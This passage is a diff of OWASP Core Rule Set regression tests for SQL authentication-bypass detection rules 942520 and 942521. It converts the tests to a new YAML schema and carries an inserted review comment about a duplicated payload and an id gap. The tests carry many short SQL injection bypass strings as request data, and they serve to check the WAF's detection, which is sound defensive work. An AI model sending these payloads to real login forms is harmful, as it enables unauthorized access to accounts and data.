text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?'bla'" + version: HTTP/1.0 + output: + log_contains: id "942511" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml index 79f614b6a..7bd43221f 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml 
@@ -2,409 +2,385 @@ meta:
 author: "terjanq, Franziska Bühler, azurit"
 description: "Detects basic SQL authentication bypass attempts 4.0/4"
- enabled: true
- name: 942520.yaml
+rule_id: 942520
 tests:
- - test_title: 942520-1
+ - test_id: 1
 desc: "Detects basic SQL auth bypass with 'is not something'"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=id'is%20not-id--"
- version: HTTP/1.0
- output:
- log_contains: id "942520"
- - test_title: 942520-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=id'is%20not-id--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942520"
+ - test_id: 2
 desc: "Negative test: 'is notes"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=id'is%20notes"
- version: HTTP/1.0
- output:
- no_log_contains: id "942520"
- - test_title: 942520-3
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=id'is%20notes"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942520"
+ - test_id: 3
 desc: "Detects basic SQL auth bypass with 'not like something'"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=id'not%20like%20id--"
- version: HTTP/1.0
- output:
- log_contains: id "942520"
- - test_title: 942520-4
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=id'not%20like%20id--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942520"
+ - test_id: 4
 desc: "Detects basic SQL auth bypass with 'not glob'"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=id'not%20glob-id--"
- version: HTTP/1.0
- output:
- log_contains: id "942520"
- - test_title: 942520-5
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=id'not%20glob-id--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942520"
+ - test_id: 5
 desc: "Detects basic SQL auth bypass with 'not like glob'"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=id'not%20glob-id--"
- version: HTTP/1.0
- output:
- log_contains: id "942520"
- - test_title: 942520-6
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=id'not%20glob-id--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942520"
+ - test_id: 6
 desc: "Detects basic SQL auth bypass with binary operators"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- # x'|email--
- data: "var=x'%7Cemail--"
- version: HTTP/1.0
- output:
- log_contains: id "942520"
- - test_title: 942520-7
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ # x'|email--
+ data: "var=x'%7Cemail--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942520"
+ - test_id: 7
 desc: "Detects basic SQL auth bypass with binary operators"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- # x'-email--
- data: "var=x'-email--"
- version: HTTP/1.0
- output:
- log_contains: id "942520"
- - test_title: 942520-8
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ # x'-email--
+ data: "var=x'-email--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942520"
+ - test_id: 8
 desc: "Detects basic SQL auth bypass with binary operators"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- 
headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- # x'+email-- (there seem to be a bug with double encoding in tests)
- data: "var=x'%252Bemail--"
- version: HTTP/1.0
- output:
- log_contains: id "942520"
- - test_title: 942520-9
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ # x'+email-- (there seem to be a bug with double encoding in tests)
+ data: "var=x'%252Bemail--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942520"
+ - test_id: 9
 desc: "Detects basic SQL auth bypass with binary operators"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- # x'^email--
- data: "var=x'%5Eemail--"
- version: HTTP/1.0
- output:
- log_contains: id "942520"
- - test_title: 942520-10
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ # x'^email--
+ data: "var=x'%5Eemail--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942520"
+ - test_id: 10
 desc: "Nagive test: Detects basic SQL auth bypass with binary operators"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- # x'@email--
- 
data: "var=x'%40email--"
- version: HTTP/1.0
- output:
- no_log_contains: id "942520"
- - test_title: 942520-11
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ # x'@email--
+ data: "var=x'%40email--"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942520"
+ - test_id: 11
 desc: "Detects basic SQL auth bypass with binary operators"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- # x'&email--
- data: "var=x'%26email--"
- version: HTTP/1.0
- output:
- log_contains: id "942520"
- - test_title: 942520-12
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ # x'&email--
+ data: "var=x'%26email--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942520"
+ - test_id: 12
 desc: "Detects basic SQL auth bypass with binary operators"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- # x'email--
- data: "var=x'%3Eemail--"
- version: HTTP/1.0
- output:
- log_contains: id "942520"
- - test_title: 942520-14
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: 
"/post"
+ # x'>email--
+ data: "var=x'%3Eemail--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942520"
+ - test_id: 14
 desc: "Detects basic SQL auth bypass with binary operators"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- # x'=email--
- data: "var=x'%3Demail--"
- version: HTTP/1.0
- output:
- log_contains: id "942520"
- - test_title: 942520-15
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ # x'=email--
+ data: "var=x'%3Demail--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942520"
+ - test_id: 15
 desc: "Detects basic SQL auth bypass with binary operators"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- # x'/email--
- data: "var=x'%2Femail--"
- version: HTTP/1.0
- output:
- log_contains: id "942520"
- - test_title: 942520-16
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ # x'/email--
+ data: "var=x'%2Femail--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942520"
+ - test_id: 16
 desc: "Detects basic SQL auth bypass with binary operators"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- # x'%email--
- data: "var=x'%25email--"
- version: HTTP/1.0
- output:
- log_contains: id "942520"
- - test_title: 942520-17
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ # x'%email--
+ data: "var=x'%25email--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942520"
+ - test_id: 17
 desc: "Negative test: Detects basic SQL auth bypass with binary operators"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- # x'~email--
- data: "var=x'~email--"
- version: HTTP/1.0
- output:
- no_log_contains: id "942520"
- - test_title: 942520-18
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ # x'~email--
+ data: "var=x'~email--"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942520"
+ - test_id: 18
 desc: "Detects basic SQL auth bypass with mod"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=x'%20mod%20id--"
- version: HTTP/1.0
- output:
- log_contains: id "942520"
- - test_title: 942520-19
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test 
agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=x'%20mod%20id--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942520"
+ - test_id: 19
 desc: "Detects basic SQL auth bypass with: sounds like"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var='sounds%20like%20rowid--"
- version: HTTP/1.0
- output:
- log_contains: id "942520"
- - test_title: 942520-20
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var='sounds%20like%20rowid--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942520"
+ - test_id: 20
 desc: "Bypass with a comment"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var='%2F**%2F*2--"
- version: HTTP/1.0
- output:
- log_contains: id "942520"
- - test_title: 942520-21
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var='%2F**%2F*2--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942520"
+ - test_id: 21
 desc: "Integration test: 942521 blocks foo'or'oof"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test 
agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=foo'or'oof"
- version: HTTP/1.0
- output:
- log_contains: id "942521"
- - test_title: 942520-22
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=foo'or'oof"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942521"
+ - test_id: 22
 desc: "Integration test: 942522 blocks foo\\''or'oof"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=foo%5c''or'oof"
- version: HTTP/1.0
- output:
- log_contains: id "942522"
- - test_title: 942520-23
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=foo%5c''or'oof"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942522"
+ - test_id: 23
 desc: "Detect auth bypass email=' is not?--"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "email=%27%20is%20not%3F--"
- version: HTTP/1.0
- output:
- log_contains: id "942520"
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "email=%27%20is%20not%3F--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942520"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml
index 4a119284b..e01b0059b 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml
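Review bot: Test 5, `desc: "Detects basic SQL auth bypass with 'not like glob'"`, re-adds `data: "var=id'not%20glob-id--"` on the new side, which is byte-for-byte the payload of test 4 ("'not glob'"), so the `not like glob` form named in the description is never sent and the test only duplicates test 4's coverage; either the payload should carry the `like` token the description promises or the description should be corrected to match what is sent. A secondary point in the same hunk: the new numeric ids go `test_id: 12` then `test_id: 14`, inheriting the gap from the old `942520-14` title, and if the runner validates contiguity or assigns ids positionally this will either fail or silently shift test 14's override name, so the gap deserves a one-line `# test 13 was removed` comment or renumbering. Both the old and new sides of test 12's comment differ (`# x'email--` vs `# x'>email--`); the new side is the correct one for the `%3E` payload, so nothing further there.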
@@ -2,410 +2,385 @@ meta:
 author: "terjanq, Franziska Bühler, azurit"
 description: "Detects basic SQL authentication bypass attempts 4.1/4"
- enabled: true
- name: 942521.yaml
+rule_id: 942521
 tests:
- - test_title: 942521-1
+ - test_id: 1
 desc: "Detects the most basic authentication bypass with 'or'"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=a'or'a"
- version: HTTP/1.0
- output:
- log_contains: id "942521"
- - test_title: 942521-2
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=a'or'a"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942521"
+ - test_id: 2
 desc: "Detects basic SQLite authentication bypass with 'or?'"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=a'or?--"
- version: HTTP/1.0
- output:
- log_contains: id "942521"
- - test_title: 942521-3
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=a'or?--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942521"
+ - test_id: 3
 desc: "False-positive: Detects or-based authentication bypass"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=is%20this%20your%20parents'%20or%20yours?"
- version: HTTP/1.0
- output:
- log_contains: id "942521"
- - test_title: 942521-4
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=is%20this%20your%20parents'%20or%20yours?"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942521"
+ - test_id: 4
 desc: "Detects basic SQL auth bypass and-based"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=user'and%20id%20is%20not?--"
- version: HTTP/1.0
- output:
- log_contains: id "942521"
- - test_title: 942521-5
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=user'and%20id%20is%20not?--"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942521"
+ - test_id: 5
 desc: "False-positve: is it your parents' or yours"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=it%20is%20your%20parents'%20and%20yours"
- version: HTTP/1.0
- output:
- log_contains: id "942521"
- - test_title: 942521-6
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ 
User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=it%20is%20your%20parents'%20and%20yours"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942521"
+ - test_id: 6
 desc: "Negative test: bob's or alice's"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=bob's%20or%20alice's"
- version: HTTP/1.0
- output:
- no_log_contains: id "942521"
- - test_title: 942521-7
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=bob's%20or%20alice's"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942521"
+ - test_id: 7
 desc: "Negative test: mother or daugher"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var=mother%20or%20daughter"
- version: HTTP/1.0
- output:
- no_log_contains: id "942521"
- - test_title: 942521-8
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=mother%20or%20daughter"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942521"
+ - test_id: 8
 desc: "Negative test: 'oreo"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: 
localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var='oreo"
- version: HTTP/1.0
- output:
- no_log_contains: id "942521"
- - test_title: 942521-9
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var='oreo"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942521"
+ - test_id: 9
 desc: "Negative test: 'fork"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var='fork"
- version: HTTP/1.0
- output:
- no_log_contains: id "942521"
- - test_title: 942521-10
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var='fork"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942521"
+ - test_id: 10
 desc: "Negative test: 'for"
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: POST
- port: 80
- uri: "/post"
- data: "var='%20for"
- version: HTTP/1.0
- output:
- no_log_contains: id "942521"
- - test_title: 942521-11
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
